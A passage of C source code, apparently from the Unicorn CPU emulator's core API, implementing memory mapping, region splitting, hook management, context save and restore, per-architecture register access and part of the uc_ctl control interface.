uint64_t end = begin + size - 1; i = bsearch_mapped_blocks(uc, begin); // is this the highest region with no possible overlap? if (i >= uc->mapped_block_count) return false; // end address overlaps this region?
if (end >= uc->mapped_blocks[i]->addr) return true; // not found return false; } // common setup/error checking shared between uc_mem_map and uc_mem_map_ptr static uc_err mem_map(uc_engine *uc, MemoryRegion *block) { MemoryRegion **regions; int pos; if (block == NULL) { return UC_ERR_NOMEM; } if ((uc->mapped_block_count & (MEM_BLOCK_INCR - 1)) == 0) { // time to grow regions = (MemoryRegion **)g_realloc( uc->mapped_blocks, sizeof(MemoryRegion *) * (uc->mapped_block_count + MEM_BLOCK_INCR)); if (regions == NULL) { return UC_ERR_NOMEM; } uc->mapped_blocks = regions; } pos = bsearch_mapped_blocks(uc, block->addr); // shift the array right to give space for the new pointer memmove(&uc->mapped_blocks[pos + 1], &uc->mapped_blocks[pos], sizeof(MemoryRegion *) * (uc->mapped_block_count - pos)); uc->mapped_blocks[pos] = block; uc->mapped_block_count++; return UC_ERR_OK; } static uc_err mem_map_check(uc_engine *uc, uint64_t address, size_t size, uint32_t perms) { if (size == 0) { // invalid memory mapping return UC_ERR_ARG; } // address cannot wrap around if (address + size - 1 < address) { return UC_ERR_ARG; } // address must be aligned to uc->target_page_size if ((address & uc->target_page_align) != 0) { return UC_ERR_ARG; } // size must be a multiple of uc->target_page_size if ((size & uc->target_page_align) != 0) { return UC_ERR_ARG; } // check for only valid permissions if ((perms & ~UC_PROT_ALL) != 0) { return UC_ERR_ARG; } // this area overlaps existing mapped regions? if (memory_overlap(uc, address, size)) { return UC_ERR_MAP; } return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_mem_map(uc_engine *uc, uint64_t address, size_t size, uint32_t perms) { uc_err res; UC_INIT(uc); res = mem_map_check(uc, address, size, perms); if (res) { restore_jit_state(uc); return res; } res = mem_map(uc, uc->memory_map(uc, address, size, perms)); restore_jit_state(uc); return res; } UNICORN_EXPORT uc_err uc_mem_map_ptr(uc_engine *uc, uint64_t address, size_t size, uint32_t perms, void *ptr) { uc_err res; UC_INIT(uc); if (ptr == NULL) { restore_jit_state(uc); return UC_ERR_ARG; } res = mem_map_check(uc, address, size, perms); if (res) { restore_jit_state(uc); return res; } res = mem_map(uc, uc->memory_map_ptr(uc, address, size, perms, ptr)); restore_jit_state(uc); return res; } UNICORN_EXPORT uc_err uc_mmio_map(uc_engine *uc, uint64_t address, size_t size, uc_cb_mmio_read_t read_cb, void *user_data_read, uc_cb_mmio_write_t write_cb, void *user_data_write) { uc_err res; UC_INIT(uc); res = mem_map_check(uc, address, size, UC_PROT_ALL); if (res) { restore_jit_state(uc); return res; } // The callbacks do not need to be checked for NULL here, as their presence // (or lack thereof) will determine the permissions used. res = mem_map(uc, uc->memory_map_io(uc, address, size, read_cb, write_cb, user_data_read, user_data_write)); restore_jit_state(uc); return res; } // Create a backup copy of the indicated MemoryRegion. // Generally used in preparation for splitting a MemoryRegion. static uint8_t *copy_region(struct uc_struct *uc, MemoryRegion *mr) { uint8_t *block = (uint8_t *)g_malloc0((size_t)int128_get64(mr->size)); if (block != NULL) { uc_err err = uc_mem_read(uc, mr->addr, block, (size_t)int128_get64(mr->size)); if (err != UC_ERR_OK) { free(block); block = NULL; } } return block; } /* This function is similar to split_region, but for MMIO memory. Note this function may be called recursively.
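   For example (hypothetical layout): if an MMIO region covers
   [0x1000, 0x3000) and the caller unmaps [0x1800, 0x2800), the region is
   removed and re-registered as [0x1000, 0x1800) and [0x2800, 0x3000),
   both keeping the original read/write callbacks and opaque data.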
*/ static bool split_mmio_region(struct uc_struct *uc, MemoryRegion *mr, uint64_t address, size_t size, bool do_delete) { uint64_t begin, end, chunk_end; size_t l_size, r_size, m_size; mmio_cbs backup; chunk_end = address + size; // This branch also breaks recursion. if (address <= mr->addr && chunk_end >= mr->end) { return true; } if (size == 0) { return false; } begin = mr->addr; end = mr->end; memcpy(&backup, mr->opaque, sizeof(mmio_cbs)); /* overlapping cases * |------mr------| * case 1 |---size--| // Is it possible??? * case 2 |--size--| * case 3 |---size--| */ // unmap this region first, then split it later if (uc_mem_unmap(uc, mr->addr, (size_t)int128_get64(mr->size)) != UC_ERR_OK) { return false; } // adjust some things if (address < begin) { address = begin; } if (chunk_end > end) { chunk_end = end; } // compute sub region sizes l_size = (size_t)(address - begin); r_size = (size_t)(end - chunk_end); m_size = (size_t)(chunk_end - address); if (l_size > 0) { if (uc_mmio_map(uc, begin, l_size, backup.read, backup.user_data_read, backup.write, backup.user_data_write) != UC_ERR_OK) { return false; } } if (m_size > 0 && !do_delete) { if (uc_mmio_map(uc, address, m_size, backup.read, backup.user_data_read, backup.write, backup.user_data_write) != UC_ERR_OK) { return false; } } if (r_size > 0) { if (uc_mmio_map(uc, chunk_end, r_size, backup.read, backup.user_data_read, backup.write, backup.user_data_write) != UC_ERR_OK) { return false; } } return true; } /* Split the given MemoryRegion at the indicated address for the indicated size; this may result in the creation of up to 3 spanning sections. If the delete parameter is true, then no new section will be created to replace the indicated range. This function exists to support uc_mem_protect and uc_mem_unmap. This is a static function and callers have already done some preliminary parameter validation. The do_delete argument indicates that we are being called to support uc_mem_unmap. In this case we save some time by choosing NOT to remap the areas that are intended to get unmapped */ // TODO: investigate whether qemu region manipulation functions already offer // this capability static bool split_region(struct uc_struct *uc, MemoryRegion *mr, uint64_t address, size_t size, bool do_delete) { uint8_t *backup; uint32_t perms; uint64_t begin, end, chunk_end; size_t l_size, m_size, r_size; RAMBlock *block = NULL; bool prealloc = false; chunk_end = address + size; // if this region belongs to area [address, address+size], // then there is no work to do. if (address <= mr->addr && chunk_end >= mr->end) { return true; } if (size == 0) { // trivial case return true; } if (address >= mr->end || chunk_end <= mr->addr) { // impossible case return false; } // Find the correct and large enough RAM block (which contains our target // mr) to create the content backup.
block = mr->ram_block; if (block == NULL) { return false; } // RAM_PREALLOC is not defined outside exec.c and I didn't feel like // moving it prealloc = !!(block->flags & 1); if (block->flags & 1) { backup = block->host; } else { backup = copy_region(uc, mr); if (backup == NULL) { return false; } } // save the essential information required for the split before mr gets // deleted perms = mr->perms; begin = mr->addr; end = mr->end; // unmap this region first, then split it later if (uc_mem_unmap(uc, mr->addr, (size_t)int128_get64(mr->size)) != UC_ERR_OK) { goto error; } /* overlapping cases * |------mr------| * case 1 |---size--| * case 2 |--size--| * case 3 |---size--| */ // adjust some things if (address < begin) { address = begin; } if (chunk_end > end) { chunk_end = end; } // compute sub region sizes l_size = (size_t)(address - begin); r_size = (size_t)(end - chunk_end); m_size = (size_t)(chunk_end - address); // If there are errors in any of the below operations, things are too far // gone at that point to recover. Could try to remap the original region, // but these smaller allocations just failed so no guarantee that we can // recover the original allocation at this point if (l_size > 0) { if (!prealloc) { if (uc_mem_map(uc, begin, l_size, perms) != UC_ERR_OK) { goto error; } if (uc_mem_write(uc, begin, backup, l_size) != UC_ERR_OK) { goto error; } } else { if (uc_mem_map_ptr(uc, begin, l_size, perms, backup) != UC_ERR_OK) { goto error; } } } if (m_size > 0 && !do_delete) { if (!prealloc) { if (uc_mem_map(uc, address, m_size, perms) != UC_ERR_OK) { goto error; } if (uc_mem_write(uc, address, backup + l_size, m_size) != UC_ERR_OK) { goto error; } } else { if (uc_mem_map_ptr(uc, address, m_size, perms, backup + l_size) != UC_ERR_OK) { goto error; } } } if (r_size > 0) { if (!prealloc) { if (uc_mem_map(uc, chunk_end, r_size, perms) != UC_ERR_OK) { goto error; } if (uc_mem_write(uc, chunk_end, backup + l_size + m_size, r_size) != UC_ERR_OK) { goto error; } } else { if (uc_mem_map_ptr(uc, chunk_end, r_size, perms, backup + l_size + m_size) != UC_ERR_OK) { goto error; } } } if (!prealloc) { free(backup); } return true; error: if (!prealloc) { free(backup); } return false; } UNICORN_EXPORT uc_err uc_mem_protect(struct uc_struct *uc, uint64_t address, size_t size, uint32_t perms) { MemoryRegion *mr; uint64_t addr = address; uint64_t pc; size_t count, len; bool remove_exec = false; UC_INIT(uc); // snapshot and protection can't be mixed if (uc->snapshot_level > 0) { restore_jit_state(uc); return UC_ERR_ARG; } if (size == 0) { // trivial case, no change restore_jit_state(uc); return UC_ERR_OK; } // address must be aligned to uc->target_page_size if ((address & uc->target_page_align) != 0) { restore_jit_state(uc); return UC_ERR_ARG; } // size must be a multiple of uc->target_page_size if ((size & uc->target_page_align) != 0) { restore_jit_state(uc); return UC_ERR_ARG; } // check for only valid permissions if ((perms & ~UC_PROT_ALL) != 0) { restore_jit_state(uc); return UC_ERR_ARG; } // check that user's entire requested block is mapped // TODO check if protected is possible // deny after cow if (!check_mem_area(uc, address, size)) { restore_jit_state(uc); return UC_ERR_NOMEM; } // Now we know entire region is mapped, so change permissions // We may need to split regions if this area spans adjacent regions addr = address; count = 0; while (count < size) { mr = uc->memory_mapping(uc, addr); len = memory_region_len(uc, mr, addr, size - count); if (mr->ram) { if (!split_region(uc, mr, addr, len, false)) {
restore_jit_state(uc); return UC_ERR_NOMEM; } mr = uc->memory_mapping(uc, addr); // will this remove EXEC permission? if (((mr->perms & UC_PROT_EXEC) != 0) && ((perms & UC_PROT_EXEC) == 0)) { remove_exec = true; } mr->perms = perms; uc->readonly_mem(mr, (perms & UC_PROT_WRITE) == 0); } else { if (!split_mmio_region(uc, mr, addr, len, false)) { restore_jit_state(uc); return UC_ERR_NOMEM; } mr = uc->memory_mapping(uc, addr); mr->perms = perms; } count += len; addr += len; } // if EXEC permission is removed, then quit TB and continue at the same // place if (remove_exec) { pc = uc->get_pc(uc); if (pc < address + size && pc >= address) { uc->quit_request = true; uc_emu_stop(uc); } } restore_jit_state(uc); return UC_ERR_OK; } static uc_err uc_mem_unmap_snapshot(struct uc_struct *uc, uint64_t address, size_t size, MemoryRegion **ret) { MemoryRegion *mr; mr = uc->memory_mapping(uc, address); while (mr->container != uc->system_memory) { mr = mr->container; } if (mr->addr != address || int128_get64(mr->size) != size) { return UC_ERR_ARG; } if (ret) { *ret = mr; } uc->memory_moveout(uc, mr); return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_mem_unmap(struct uc_struct *uc, uint64_t address, size_t size) { MemoryRegion *mr; uint64_t addr; size_t count, len; UC_INIT(uc); if (size == 0) { // nothing to unmap restore_jit_state(uc); return UC_ERR_OK; } // address must be aligned to uc->target_page_size if ((address & uc->target_page_align) != 0) { restore_jit_state(uc); return UC_ERR_ARG; } // size must be multiple of uc->target_page_size if ((size & uc->target_page_align) != 0) { restore_jit_state(uc); return UC_ERR_ARG; } // check that user's entire requested block is mapped if (!check_mem_area(uc, address, size)) { restore_jit_state(uc); return UC_ERR_NOMEM; } if (uc->snapshot_level > 0) { uc_err res = uc_mem_unmap_snapshot(uc, address, size, NULL); restore_jit_state(uc); return res; } // Now we know entire region is mapped, so do the unmap // We may need to split regions if this area spans adjacent regions addr = address; count = 0; while (count < size) { mr = uc->memory_mapping(uc, addr); len = memory_region_len(uc, mr, addr, size - count); if (!mr->ram) { if (!split_mmio_region(uc, mr, addr, len, true)) { restore_jit_state(uc); return UC_ERR_NOMEM; } } else { if (!split_region(uc, mr, addr, len, true)) { restore_jit_state(uc); return UC_ERR_NOMEM; } } // if we can retrieve the mapping, then no splitting took place // so unmap here mr = uc->memory_mapping(uc, addr); if (mr != NULL) { uc->memory_unmap(uc, mr); } count += len; addr += len; } restore_jit_state(uc); return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, void *user_data, uint64_t begin, uint64_t end, ...) 
{ int ret = UC_ERR_OK; int i = 0; UC_INIT(uc); struct hook *hook = calloc(1, sizeof(struct hook)); if (hook == NULL) { restore_jit_state(uc); return UC_ERR_NOMEM; } hook->begin = begin; hook->end = end; hook->type = type; hook->callback = callback; hook->user_data = user_data; hook->refs = 0; hook->to_delete = false; hook->hooked_regions = g_hash_table_new_full( hooked_regions_hash, hooked_regions_equal, g_free, NULL); *hh = (uc_hook)hook; // UC_HOOK_INSN has an extra argument for instruction ID if (type & UC_HOOK_INSN) { va_list valist; va_start(valist, end); hook->insn = va_arg(valist, int); va_end(valist); if (uc->insn_hook_validate) { if (!uc->insn_hook_validate(hook->insn)) { free(hook); restore_jit_state(uc); return UC_ERR_HOOK; } } if (uc->hook_insert) { if (hook_insert(&uc->hook[UC_HOOK_INSN_IDX], hook) == NULL) { free(hook); restore_jit_state(uc); return UC_ERR_NOMEM; } } else { if (hook_append(&uc->hook[UC_HOOK_INSN_IDX], hook) == NULL) { free(hook); restore_jit_state(uc); return UC_ERR_NOMEM; } } uc->hooks_count[UC_HOOK_INSN_IDX]++; restore_jit_state(uc); return UC_ERR_OK; } if (type & UC_HOOK_TCG_OPCODE) { va_list valist; va_start(valist, end); hook->op = va_arg(valist, int); hook->op_flags = va_arg(valist, int); va_end(valist); if (uc->opcode_hook_invalidate) { if (!uc->opcode_hook_invalidate(hook->op, hook->op_flags)) { free(hook); restore_jit_state(uc); return UC_ERR_HOOK; } } if (uc->hook_insert) { if (hook_insert(&uc->hook[UC_HOOK_TCG_OPCODE_IDX], hook) == NULL) { free(hook); restore_jit_state(uc); return UC_ERR_NOMEM; } } else { if (hook_append(&uc->hook[UC_HOOK_TCG_OPCODE_IDX], hook) == NULL) { free(hook); restore_jit_state(uc); return UC_ERR_NOMEM; } } uc->hooks_count[UC_HOOK_TCG_OPCODE_IDX]++; restore_jit_state(uc); return UC_ERR_OK; } while ((type >> i) > 0) { if ((type >> i) & 1) { // TODO: invalid hook error? if (i < UC_HOOK_MAX) { if (uc->hook_insert) { if (hook_insert(&uc->hook[i], hook) == NULL) { free(hook); restore_jit_state(uc); return UC_ERR_NOMEM; } } else { if (hook_append(&uc->hook[i], hook) == NULL) { free(hook); restore_jit_state(uc); return UC_ERR_NOMEM; } } uc->hooks_count[i]++; } } i++; } // we didn't use the hook // TODO: return an error? if (hook->refs == 0) { free(hook); } restore_jit_state(uc); return ret; } UNICORN_EXPORT uc_err uc_hook_del(uc_engine *uc, uc_hook hh) { int i; struct hook *hook = (struct hook *)hh; UC_INIT(uc); // we can't dereference hook->type if hook is invalid // so for now we need to iterate over all possible types to remove the hook // which is less efficient // an optimization would be to align the hook pointer // and store the type mask in the hook pointer. for (i = 0; i < UC_HOOK_MAX; i++) { if (list_exists(&uc->hook[i], (void *)hook)) { g_hash_table_foreach(hook->hooked_regions, hook_invalidate_region, uc); g_hash_table_remove_all(hook->hooked_regions); hook->to_delete = true; uc->hooks_count[i]--; hook_append(&uc->hooks_to_del, hook); } } restore_jit_state(uc); return UC_ERR_OK; } // TCG helper // 2 arguments are enough for most opcodes. Load/Store needs 3 arguments but we // have memory hooks already. We may exceed the maximum arguments of a tcg // helper but that's easy to extend.
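/*
 * Illustrative registration (not part of this file), assuming the
 * UC_TCG_OP_SUB and UC_TCG_OP_FLAG_CMP constants from the public header;
 * trace_sub_cmp is a hypothetical callback with the uc_hook_tcg_op_2
 * signature used below:
 *
 *     uc_hook hh;
 *     uc_hook_add(uc, &hh, UC_HOOK_TCG_OPCODE, trace_sub_cmp, NULL, 1, 0,
 *                 UC_TCG_OP_SUB, UC_TCG_OP_FLAG_CMP);
 */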
void helper_uc_traceopcode(struct hook *hook, uint64_t arg1, uint64_t arg2, uint32_t size, void *handle, uint64_t address); void helper_uc_traceopcode(struct hook *hook, uint64_t arg1, uint64_t arg2, uint32_t size, void *handle, uint64_t address) { struct uc_struct *uc = handle; if (unlikely(uc->stop_request)) { return; } if (unlikely(hook->to_delete)) { return; } // We did all checks at translation time. // // This could optimize the case that we have multiple hooks with different // opcodes and have one callback per opcode. Note that the assumption // doesn't hold in most cases for uc_tracecode. // // TODO: Shall we have a flag to allow users to control whether to update // the PC? JIT_CALLBACK_GUARD(((uc_hook_tcg_op_2)hook->callback)( uc, address, arg1, arg2, size, hook->user_data)); if (unlikely(uc->stop_request)) { return; } } void helper_uc_tracecode(int32_t size, uc_hook_idx index, void *handle, int64_t address); void helper_uc_tracecode(int32_t size, uc_hook_idx index, void *handle, int64_t address) { struct uc_struct *uc = handle; struct list_item *cur; struct hook *hook; int hook_flags = index & UC_HOOK_FLAG_MASK; // The index here may contain additional flags. See // the comments of uc_hook_idx for details. index = index & UC_HOOK_IDX_MASK; // This has been done in tcg code. // sync PC in CPUArchState with address // if (uc->set_pc) { // uc->set_pc(uc, address); // } // the last callback may have already asked to stop emulation if (uc->stop_request && !(hook_flags & UC_HOOK_FLAG_NO_STOP)) { return; } for (cur = uc->hook[index].head; cur != NULL && (hook = (struct hook *)cur->data); cur = cur->next) { if (hook->to_delete) { continue; } // on invalid block/instruction, call instruction counter (if enabled), // then quit if (size == 0) { if (index == UC_HOOK_CODE_IDX && uc->count_hook) { // this is the instruction counter (first hook in the list) JIT_CALLBACK_GUARD(((uc_cb_hookcode_t)hook->callback)( uc, address, size, hook->user_data)); } return; } if (HOOK_BOUND_CHECK(hook, (uint64_t)address)) { JIT_CALLBACK_GUARD(((uc_cb_hookcode_t)hook->callback)( uc, address, size, hook->user_data)); } // the last callback may have already asked to stop emulation // Unicorn: // In an ARM IT block, we behave as if the emulation continues // normally. No check_exit_request is generated and the hooks are // triggered normally. In other words, the whole IT block is treated // as a single instruction.
if (uc->stop_request && !(hook_flags & UC_HOOK_FLAG_NO_STOP)) { break; } } } UNICORN_EXPORT uc_err uc_mem_regions(uc_engine *uc, uc_mem_region **regions, uint32_t *count) { uint32_t i; uc_mem_region *r = NULL; UC_INIT(uc); *count = uc->mapped_block_count; if (*count) { r = g_malloc0(*count * sizeof(uc_mem_region)); if (r == NULL) { // out of memory restore_jit_state(uc); return UC_ERR_NOMEM; } } for (i = 0; i < *count; i++) { r[i].begin = uc->mapped_blocks[i]->addr; r[i].end = uc->mapped_blocks[i]->end - 1; r[i].perms = uc->mapped_blocks[i]->perms; } *regions = r; restore_jit_state(uc); return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_query(uc_engine *uc, uc_query_type type, size_t *result) { UC_INIT(uc); switch (type) { default: return UC_ERR_ARG; case UC_QUERY_PAGE_SIZE: *result = uc->target_page_size; break; case UC_QUERY_ARCH: *result = uc->arch; break; case UC_QUERY_MODE: #ifdef UNICORN_HAS_ARM if (uc->arch == UC_ARCH_ARM) { return uc->query(uc, type, result); } #endif *result = uc->mode; break; case UC_QUERY_TIMEOUT: *result = uc->timed_out; break; } restore_jit_state(uc); return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_context_alloc(uc_engine *uc, uc_context **context) { struct uc_context **_context = context; size_t size = uc_context_size(uc); UC_INIT(uc); *_context = g_malloc(size); if (*_context) { (*_context)->context_size = size - sizeof(uc_context); (*_context)->arch = uc->arch; (*_context)->mode = uc->mode; restore_jit_state(uc); return UC_ERR_OK; } else { restore_jit_state(uc); return UC_ERR_NOMEM; } } UNICORN_EXPORT uc_err uc_free(void *mem) { g_free(mem); return UC_ERR_OK; } UNICORN_EXPORT size_t uc_context_size(uc_engine *uc) { UC_INIT(uc); restore_jit_state(uc); if (!uc->context_size) { // return the total size of struct uc_context return sizeof(uc_context) + uc->cpu_context_size; } else { return sizeof(uc_context) + uc->context_size(uc); } } UNICORN_EXPORT uc_err uc_context_save(uc_engine *uc, uc_context *context) { UC_INIT(uc); uc_err ret = UC_ERR_OK; if (uc->context_content & UC_CTL_CONTEXT_MEMORY) { ret = uc_snapshot(uc); if (ret != UC_ERR_OK) { restore_jit_state(uc); return ret; } } context->snapshot_level = uc->snapshot_level; if (uc->context_content & UC_CTL_CONTEXT_CPU) { if (!uc->context_save) { memcpy(context->data, uc->cpu->env_ptr, context->context_size); restore_jit_state(uc); return UC_ERR_OK; } else { ret = uc->context_save(uc, context); restore_jit_state(uc); return ret; } } restore_jit_state(uc); return ret; } // Keep in mind that we don't have a uc_engine when reading/writing the // registers of a context. static context_reg_rw_t find_context_reg_rw(uc_arch arch, uc_mode mode) { // We believe that the arch/mode pair is correct.
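/*
 * Illustrative usage (not part of this file): a saved context can be
 * inspected without a live engine, e.g.
 *
 *     uc_context *ctx;
 *     uc_context_alloc(uc, &ctx);
 *     uc_context_save(uc, ctx);
 *     uint64_t rax;
 *     uc_context_reg_read(ctx, UC_X86_REG_RAX, &rax); // no engine handle
 *
 * which is why the read/write pair is resolved from the context's own
 * arch/mode below instead of from a uc_engine.
 */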
context_reg_rw_t rw = {default_reg_read, default_reg_write}; switch (arch) { default: break; #ifdef UNICORN_HAS_M68K case UC_ARCH_M68K: rw.read = reg_read_m68k; rw.write = reg_write_m68k; break; #endif #ifdef UNICORN_HAS_X86 case UC_ARCH_X86: rw.read = reg_read_x86_64; rw.write = reg_write_x86_64; break; #endif #ifdef UNICORN_HAS_ARM case UC_ARCH_ARM: rw.read = reg_read_arm; rw.write = reg_write_arm; break; #endif #ifdef UNICORN_HAS_ARM64 case UC_ARCH_ARM64: rw.read = reg_read_aarch64; rw.write = reg_write_aarch64; break; #endif #if defined(UNICORN_HAS_MIPS) || defined(UNICORN_HAS_MIPSEL) || \ defined(UNICORN_HAS_MIPS64) || defined(UNICORN_HAS_MIPS64EL) case UC_ARCH_MIPS: if (mode & UC_MODE_BIG_ENDIAN) { #ifdef UNICORN_HAS_MIPS if (mode & UC_MODE_MIPS32) { rw.read = reg_read_mips; rw.write = reg_write_mips; } #endif #ifdef UNICORN_HAS_MIPS64 if (mode & UC_MODE_MIPS64) { rw.read = reg_read_mips64; rw.write = reg_write_mips64; } #endif } else { // little endian #ifdef UNICORN_HAS_MIPSEL if (mode & UC_MODE_MIPS32) { rw.read = reg_read_mipsel; rw.write = reg_write_mipsel; } #endif #ifdef UNICORN_HAS_MIPS64EL if (mode & UC_MODE_MIPS64) { rw.read = reg_read_mips64el; rw.write = reg_write_mips64el; } #endif } break; #endif #ifdef UNICORN_HAS_SPARC case UC_ARCH_SPARC: if (mode & UC_MODE_SPARC64) { rw.read = reg_read_sparc64; rw.write = reg_write_sparc64; } else { rw.read = reg_read_sparc; rw.write = reg_write_sparc; } break; #endif #ifdef UNICORN_HAS_PPC case UC_ARCH_PPC: if (mode & UC_MODE_PPC64) { rw.read = reg_read_ppc64; rw.write = reg_write_ppc64; } else { rw.read = reg_read_ppc; rw.write = reg_write_ppc; } break; #endif #ifdef UNICORN_HAS_RISCV case UC_ARCH_RISCV: if (mode & UC_MODE_RISCV32) { rw.read = reg_read_riscv32; rw.write = reg_write_riscv32; } else if (mode & UC_MODE_RISCV64) { rw.read = reg_read_riscv64; rw.write = reg_write_riscv64; } break; #endif #ifdef UNICORN_HAS_S390X case UC_ARCH_S390X: rw.read = reg_read_s390x; rw.write = reg_write_s390x; break; #endif #ifdef UNICORN_HAS_TRICORE case UC_ARCH_TRICORE: rw.read = reg_read_tricore; rw.write = reg_write_tricore; break; #endif } return rw; } UNICORN_EXPORT uc_err uc_context_reg_write(uc_context *ctx, int regid, const void *value) { int setpc = 0; size_t size = (size_t)-1; return find_context_reg_rw(ctx->arch, ctx->mode) .write(ctx->data, ctx->mode, regid, value, &size, &setpc); } UNICORN_EXPORT uc_err uc_context_reg_read(uc_context *ctx, int regid, void *value) { size_t size = (size_t)-1; return find_context_reg_rw(ctx->arch, ctx->mode) .read(ctx->data, ctx->mode, regid, value, &size); } UNICORN_EXPORT uc_err uc_context_reg_write2(uc_context *ctx, int regid, const void *value, size_t *size) { int setpc = 0; return find_context_reg_rw(ctx->arch, ctx->mode) .write(ctx->data, ctx->mode, regid, value, size, &setpc); } UNICORN_EXPORT uc_err uc_context_reg_read2(uc_context *ctx, int regid, void *value, size_t *size) { return find_context_reg_rw(ctx->arch, ctx->mode) .read(ctx->data, ctx->mode, regid, value, size); } UNICORN_EXPORT uc_err uc_context_reg_write_batch(uc_context *ctx, int *regs, void *const *vals, int count) { reg_write_t reg_write = find_context_reg_rw(ctx->arch, ctx->mode).write; void *env = ctx->data; int mode = ctx->mode; int setpc = 0; int i; for (i = 0; i < count; i++) { unsigned int regid = regs[i]; const void *value = vals[i]; size_t size = (size_t)-1; uc_err err = reg_write(env, mode, regid, value, &size, &setpc); if (err) { return err; } } return UC_ERR_OK; } UNICORN_EXPORT uc_err 
uc_context_reg_read_batch(uc_context *ctx, int *regs, void **vals, int count) { reg_read_t reg_read = find_context_reg_rw(ctx->arch, ctx->mode).read; void *env = ctx->data; int mode = ctx->mode; int i; for (i = 0; i < count; i++) { unsigned int regid = regs[i]; void *value = vals[i]; size_t size = (size_t)-1; uc_err err = reg_read(env, mode, regid, value, &size); if (err) { return err; } } return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_context_reg_write_batch2(uc_context *ctx, int *regs, const void *const *vals, size_t *sizes, int count) { reg_write_t reg_write = find_context_reg_rw(ctx->arch, ctx->mode).write; void *env = ctx->data; int mode = ctx->mode; int setpc = 0; int i; for (i = 0; i < count; i++) { unsigned int regid = regs[i]; const void *value = vals[i]; uc_err err = reg_write(env, mode, regid, value, sizes + i, &setpc); if (err) { return err; } } return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_context_reg_read_batch2(uc_context *ctx, int *regs, void *const *vals, size_t *sizes, int count) { reg_read_t reg_read = find_context_reg_rw(ctx->arch, ctx->mode).read; void *env = ctx->data; int mode = ctx->mode; int i; for (i = 0; i < count; i++) { unsigned int regid = regs[i]; void *value = vals[i]; uc_err err = reg_read(env, mode, regid, value, sizes + i); if (err) { return err; } } return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_context_restore(uc_engine *uc, uc_context *context) { UC_INIT(uc); uc_err ret; if (uc->context_content & UC_CTL_CONTEXT_MEMORY) { uc->snapshot_level = context->snapshot_level; ret = uc_restore_latest_snapshot(uc); if (ret != UC_ERR_OK) { return ret; } uc_snapshot(uc); } if (uc->context_content & UC_CTL_CONTEXT_CPU) { if (!uc->context_restore) { memcpy(uc->cpu->env_ptr, context->data, context->context_size); return UC_ERR_OK; } else { return uc->context_restore(uc, context); } } return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_context_free(uc_context *context) { return uc_free(context); } typedef struct _uc_ctl_exit_request { uint64_t *array; size_t len; } uc_ctl_exit_request; static inline gboolean uc_read_exit_iter(gpointer key, gpointer val, gpointer data) { uc_ctl_exit_request *req = (uc_ctl_exit_request *)data; req->array[req->len++] = *(uint64_t *)key; return false; } UNICORN_EXPORT uc_err uc_ctl(uc_engine *uc, uc_control_type control, ...) { int rw, type; uc_err err = UC_ERR_OK; va_list args; // MSVC would do a signed shift on signed integers.
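/*
 * The control word packs the I/O direction into its top two bits and the
 * control type into the low 16 bits. Callers normally build it with the
 * UC_CTL_READ()/UC_CTL_WRITE() helper macros from the public header,
 * e.g. (illustrative):
 *
 *     int mode;
 *     uc_ctl(uc, UC_CTL_READ(UC_CTL_UC_MODE, 1), &mode);
 */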
rw = (uint32_t)control >> 30; type = (control & ((1 << 16) - 1)); va_start(args, control); switch (type) { case UC_CTL_UC_MODE: { if (rw == UC_CTL_IO_READ) { int *pmode = va_arg(args, int *); *pmode = uc->mode; } else { err = UC_ERR_ARG; } break; } case UC_CTL_UC_ARCH: { if (rw == UC_CTL_IO_READ) { int *arch = va_arg(args, int *); *arch = uc->arch; } else { err = UC_ERR_ARG; } break; } case UC_CTL_UC_TIMEOUT: { if (rw == UC_CTL_IO_READ) { uint64_t *timeout = va_arg(args, uint64_t *); *timeout = uc->timeout; } else { err = UC_ERR_ARG; } break; } case UC_CTL_UC_PAGE_SIZE: { if (rw == UC_CTL_IO_READ) { UC_INIT(uc); uint32_t *page_size = va_arg(args, uint32_t *); *page_size = uc->target_page_size; restore_jit_state(uc); } else { uint32_t page_size = va_arg(args, uint32_t); int bits = 0; if (uc->init_done) { err = UC_ERR_ARG; break; } if (uc->arch != UC_ARCH_ARM) { err = UC_ERR_ARG; break; } if ((page_size & (page_size - 1))) { err = UC_ERR_ARG; break; } while (page_size) { bits++; page_size >>= 1; } uc->target_bits = bits; err = UC_ERR_OK; } break; } case UC_CTL_UC_USE_EXITS: { if (rw == UC_CTL_IO_WRITE) { int use_exits = va_arg(args, int); uc->use_exits = use_exits; } else { err = UC_ERR_ARG; } break; } case UC_CTL_UC_EXITS_CNT: { UC_INIT(uc); if (!uc->use_exits) { err = UC_ERR_ARG; } else if (rw == UC_CTL_IO_READ) { size_t *exits_cnt = va_arg(args, size_t *); *exits_cnt = g_tree_nnodes(uc->ctl_exits); } else { err = UC_ERR_ARG; } restore_jit_state(uc); break; } case UC_CTL_UC_EXITS: { UC_INIT(uc); if (!uc->use_exits) { err = UC_ERR_ARG; } else if (rw == UC_CTL_IO_READ) { uint64_t *exits = va_arg(args, uint64_t *); size_t cnt = va_arg(args, size_t); if (cnt < g_tree_nnodes(uc->ctl_exits)) { err = UC_ERR_ARG; } else { uc_ctl_exit_request req; req.array = exits; req.len = 0; g_tree_foreach(uc->ctl_exits, uc_read_exit_iter, (void *)&req); } } else if (rw == UC_CTL_IO_WRITE) { uint64_t *exits = va_arg(args, uint64_t *); size_t cnt = va_arg(args, size_t); g_tree_remove_all(uc->ctl_exits); for (size_t i = 0; i < cnt; i++) { uc_add_exit(uc, exits[i]); } } else { err = UC_ERR_ARG; } restore_jit_state(uc); break; } case UC_CTL_CPU_MODEL: { if (rw == UC_CTL_IO_READ) { UC_INIT(uc); int *model = va_arg(args, int *); *model = uc->cpu_model; restore_jit_state(uc); } else { int model = va_arg(args, int); if (model < 0 || uc->init_done) { err = UC_ERR_ARG; break; } if (uc->arch == UC_ARCH_X86) { if (model >= UC_CPU_X86_ENDING) { err = UC_ERR_ARG; break; } } else if (uc->arch == UC_ARCH_ARM) { if (model >= UC_CPU_ARM_ENDING) { err = UC_ERR_ARG; break; } if (uc->mode & UC_MODE_BIG_ENDIAN) { // These cpu models don't support big endian code access.
